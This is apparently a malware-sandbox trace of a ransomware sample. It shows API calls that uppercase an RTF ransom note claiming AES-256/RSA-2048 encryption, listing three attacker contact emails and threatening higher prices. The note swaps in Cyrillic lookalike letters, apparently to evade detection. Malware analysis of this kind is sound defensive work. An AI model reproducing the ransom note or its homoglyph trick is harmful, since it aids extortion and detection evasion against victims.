TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND US SH\\F1\\LANG1049\\'EE\\F0\\LANG1033 ULD N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NT\\F1\\LANG1049\\'E0\\F0\\LANG1033 IN \\F1\\LANG1049\\'E0\\F0\\LANG1033 N\\F1\\LANG1049\\'F3\\F0\\LANG1033 V\\F1\\LANG1049\\'E0\\F0\\LANG1033 LU\\F1\\LANG1049\\'E0\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 INF\\F1\\LANG1049\\'EE\\F0\\LANG1033 RM\\F1\\LANG1049\\'E0\\F0\\LANG1033 TI\\F1\\LANG1049\\'EE\\F0\\LANG1033 N.\\F1\\LANG1049 \\F0\\LANG1033 W\\F1\\LANG1049\\'E5\\F0\\LANG1033 WILL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FILES IN \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SP\\F1\\LANG1049\\'EE\\F0\\LANG1033 NS\\F1\\LANG1049\\'E5\\F0\\LANG1033 F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NFID\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 .\\PAR\r\nOF COURSE YOU WILL RECEIVE ALL THE NECESSARY INSTRUCTIONS H\\F1\\LANG1049\\'EE\\F0\\LANG1033 W T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\PAR\r\n\\CF1\\B IMPORTANT!\\PAR\r\n\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE THAT WE ARE PROFESSIONALS AND JUST DOING OUR JOB!\\PAR\r\nPLEASE D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T W\\F1\\LANG1049\\'E0\\F0\\LANG1033 ST\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 TIM\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T TR\\F1\\LANG1049\\'F3\\F0\\LANG1033 TO D\\F1\\LANG1049\\'E5\\'F1\\'E5\\F0\\LANG1033 IVE US - IT WILL R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SULT \\F1\\LANG1049\\'EE\\F0\\LANG1033 NLY PRI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 INCR\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 !\\PAR\r\nW\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ALW\\F1\\LANG1049\\'E0\\'F3\\F0\\LANG1033 S \\F1\\LANG1049\\'EE\\F0\\LANG1033 P\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'E5\\F0\\LANG1033 D F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R DI\\F1\\LANG1049\\'E0\\F0\\LANG1033 L\\F1\\LANG1049\\'EE\\F0\\LANG1033 G \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 DY T\\F1\\LANG1049\\'EE\\F0\\LANG1033 H\\F1\\LANG1049\\'E5\\F0\\LANG1033 LP \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U.\\PAR\r\n\\CF2\\FS28 [RDM_STR]\\CF0\\F1\\FS32\\LANG1049\\PAR\r\n}\r\n") returned 0x1c34 [0064.343] CharUpperBuffW (in: lpsz="[EML3]", cchLength=0x6 | out: lpsz="[EML3]") returned 0x6 [0064.343] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 [KID]\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 [RDM_STR]\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchLength=0x1c45 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\NOUICOMPAT\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET0 CALIBRI;}{\\F1\\FNIL\\FCHARSET204 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;\\RED255\\GREEN255\\BLUE255;}\r\n{\\*\\GENERATOR RICHED20 10.0.15063}\\VIEWKIND4\\UC1 \r\n\\PARD\\RI-74\\SL240\\SLMULT1\\QC\\TX8378\\B\\F0\\FS24\\LANG1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\PAR\r\n\r\n\\PARD\\RI-74\\SL240\\SLMULT1\\TX8378\\PAR\r\n\\B0 ALL Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S W\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D WITH STR\\F1\\LANG1049\\'EE\\F0\\LANG1033 NG CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LG\\F1\\LANG1049\\'EE\\F0\\LANG1033 RITHM \\F1\\LANG1049\\'C0\\'C5\\F0\\LANG1033 S-256 + RS\\F1\\LANG1049\\'C0\\F0\\LANG1033 -2048.\\PAR\r\nPL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 B\\F1\\LANG1049\\'E5\\F0\\LANG1033 SUR\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T BR\\F1\\LANG1049\\'EE\\F0\\LANG1033 K\\F1\\LANG1049\\'E5\\F0\\LANG1033 N \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U C\\F1\\LANG1049\\'E0\\F0\\LANG1033 N R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 M T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E0\\F0\\LANG1033 Y.\\PAR\r\n\\PAR\r\nIF Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 W\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT T\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 US T\\F1\\LANG1049\\'EE\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 ILS:\\PAR\r\n\\B\\FS28 BOBGREEN85@CRIPTEXT.COM\\PAR\r\nBOBGREEN85@AOL.COM\\PAR\r\nBOBGREEN85@TUTANOTA.COM\\PAR\r\n\\B0\\FS24 IN SUBJ\\F1\\LANG1049\\'E5\\F0\\LANG1033 CT LIN\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 UR ID: \\B\\FS28 [KID]\\FS24\\PAR\r\n\\PAR\r\n\\CF1 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT!\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR M\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E0\\F0\\LANG1033 G\\F1\\LANG1049\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'EE\\F0\\LANG1033 F \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR 3 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL \\F1\\LANG1049\\'E0\\F0\\LANG1033 DDR\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E5\\F0\\LANG1033 S. THIS IS R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT B\\F1\\LANG1049\\'E5\\F0\\LANG1033 C\\F1\\LANG1049\\'E0\\F0\\LANG1033 US\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'EE\\F0\\LANG1033 F D\\F1\\LANG1049\\'E5\\F0\\LANG1033 LIV\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PR\\F1\\LANG1049\\'EE\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 MS \\F1\\LANG1049\\'EE\\F0\\LANG1033 F S\\F1\\LANG1049\\'EE\\F0\\LANG1033 M\\F1\\LANG1049\\'E5\\F0\\LANG1033 M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 RVI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\CF1 IMPORTANT!\\CF0 IF YOU HAVEN'T RECEIVED A RESPONSE FROM US WITHIN 24 HOURS, PLEASE TRY TO USE A DIFFERENT EMAIL SERVICE\\F1\\LANG1049 (\\F0\\LANG1033 GMAIL, YAHOO, AOL, ETC\\F1\\LANG1049 )\\F0\\LANG1033 .\\PAR\r\n\\CF1 IMPORTANT!\\CF0 PLEASE CHECK YOUR SPAM FOLDER EACH TIME YOU WAIT FOR OUR RESPONSE! IF YOU FIND OUR EMAIL IN THE SPAM FOLDER PLEASE MOVE IT TO YOUR INBOX.\\PAR\r\n\\CF1 IMPORTANT! \\CF0 WE ARE ALWAYS IN TOUCH AND READY TO HELP YOU AS SOON AS POSSIBLE!\\PAR\r\n\\PAR\r\n\\B0\\F1\\LANG1049\\'C0\\F0\\LANG1033 TT\\F1\\LANG1049\\'E0\\F0\\LANG1033 CH UP T\\F1\\LANG1049\\'EE\\F0\\LANG1033 3 SM\\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'E5\\F0\\LANG1033 NCR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R FR\\F1\\LANG1049\\'E5\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\'F1\\F0\\LANG1033 RYPTION. PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND US SH\\F1\\LANG1049\\'EE\\F0\\LANG1033 ULD N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NT\\F1\\LANG1049\\'E0\\F0\\LANG1033 IN \\F1\\LANG1049\\'E0\\F0\\LANG1033 N\\F1\\LANG1049\\'F3\\F0\\LANG1033 V\\F1\\LANG1049\\'E0\\F0\\LANG1033 LU\\F1\\LANG1049\\'E0\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 INF\\F1\\LANG1049\\'EE\\F0\\LANG1033 RM\\F1\\LANG1049\\'E0\\F0\\LANG1033 TI\\F1\\LANG1049\\'EE\\F0\\LANG1033 N.\\F1\\LANG1049 \\F0\\LANG1033 W\\F1\\LANG1049\\'E5\\F0\\LANG1033 WILL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FILES IN \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SP\\F1\\LANG1049\\'EE\\F0\\LANG1033 NS\\F1\\LANG1049\\'E5\\F0\\LANG1033 F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NFID\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 .\\PAR\r\nOF COURSE YOU WILL RECEIVE ALL THE NECESSARY INSTRUCTIONS H\\F1\\LANG1049\\'EE\\F0\\LANG1033 W T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\PAR\r\n\\CF1\\B IMPORTANT!\\PAR\r\n\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE THAT WE ARE PROFESSIONALS AND JUST DOING OUR JOB!\\PAR\r\nPLEASE D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T W\\F1\\LANG1049\\'E0\\F0\\LANG1033 ST\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 TIM\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T TR\\F1\\LANG1049\\'F3\\F0\\LANG1033 TO D\\F1\\LANG1049\\'E5\\'F1\\'E5\\F0\\LANG1033 IVE US - IT WILL R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SULT \\F1\\LANG1049\\'EE\\F0\\LANG1033 NLY PRI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 INCR\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 